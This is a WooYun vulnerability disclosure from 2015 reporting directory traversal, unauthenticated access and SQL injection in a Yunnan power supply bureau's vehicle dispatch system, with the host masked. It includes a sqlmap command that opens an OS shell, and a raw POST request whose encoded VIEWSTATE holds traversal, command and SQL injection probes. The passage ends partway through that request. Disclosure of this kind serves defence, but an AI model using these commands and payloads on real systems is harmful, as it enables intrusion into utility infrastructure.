当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0138506

漏洞标题:云南西双版纳供电局车辆调度系统存在遍历目录/无认证访问/SQL注入漏洞(可os-shell)

相关厂商:云南电网

漏洞作者: qglfnt

提交时间:2015-09-04 09:01

修复时间:2015-10-22 08:24

公开时间:2015-10-22 08:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-04: 细节已通知厂商并且等待厂商处理中
2015-09-07: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-09-17: 细节向核心白帽子及相关领域专家公开
2015-09-27: 细节向普通白帽子公开
2015-10-07: 细节向实习白帽子公开
2015-10-22: 细节向公众公开

简要描述:

RT

详细说明:

**.**.**.**/Login/Login.aspx

漏洞证明:

遍历目录,还有其它目录都可遍历

20150902012211.png


20150902010700.png


页面均可无认证访问

20150902010908.png


20150902011057.png


SQL注入
sqlmap -r 1.txt -p txtSearch --os-shell

POST /KnowladgeCenter/Contacts.aspx?menu=list HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**/KnowladgeCenter/Contacts.aspx?menu=list
Cookie: ASP.NET_SessionId=yt3wfxp1fhx10alzfrldvb5k
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 21718
__EVENTTARGET=gvContacts&__EVENTARGUMENT=Page%242&__VIEWSTATE=%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%2BD2QWEmYPZBYCZg8VAQI2MmQCAQ8PFgIfAwUBMWRkAgIPDxYCHwMFATFkZAIDDw8WAh8DBQMxW11kZAIEDw8WAh8DBQExZGQCBQ8PFgIfAwUDMS0xZGQCBg8PFgIfAwUBMWRkAgcPDxYCHwMFATFkZAIID2QWBGYPDxYCHwQFAzQ0N2RkAgEPDxYCHwQFAzQ0N2RkAj8PZBYSZg9kFgJmDxUBAjYzZAIBDw8WAh8DBQExZGQCAg8PFgIfAwUBMWRkAgMPDxYCHwMFATFkZAIEDw8WAh8DBQExZGQCBQ8PFgIfAwUDMS0xZGQCBg8PFgIfAwUDMVtdZGQCBw8PFgIfAwUBMWRkAggPZBYEZg8PFgIfBAUDNDQ4ZGQCAQ8PFgIfBAUDNDQ4ZGQCQA9kFhJmD2QWAmYPFQECNjRkAgEPDxYCHwMFATFkZAICDw8WAh8DBQExZGQCAw8PFgIfAwUBMWRkAgQPDxYCHwMFATFkZAIFDw8WAh8DBQMxLTFkZAIGDw8WAh8DBRNtdWx0aWRiYXBwc2VjdXJpdHkyZGQCBw8PFgIfAwUBMWRkAggPZBYEZg8PFgIfBAUDNDQ5ZGQCAQ8PFgIfBAUDNDQ5ZGQCQQ9kFhJmD2QWAmYPFQECNjVkAgEPDxYCHwMFATFkZAICDw8WAh8DBQExZGQCAw8PFgIfAwUBMWRkAgQPDxYCHwMFATFkZAIFDw8WAh8DBQMxLTFkZAIGDw8WAh8DBRF3d3cuYW5vbnltb3VzLmNvbWRkAgcPDxYCHwMFATFkZAIID2QWBGYPDxYCHwQFAzQ1MGRkAgEPDxYCHwQFAzQ1MGRkAkIPZBYSZg9kFgJmDxUBAjY2ZAIBDw8WAh8DBQEx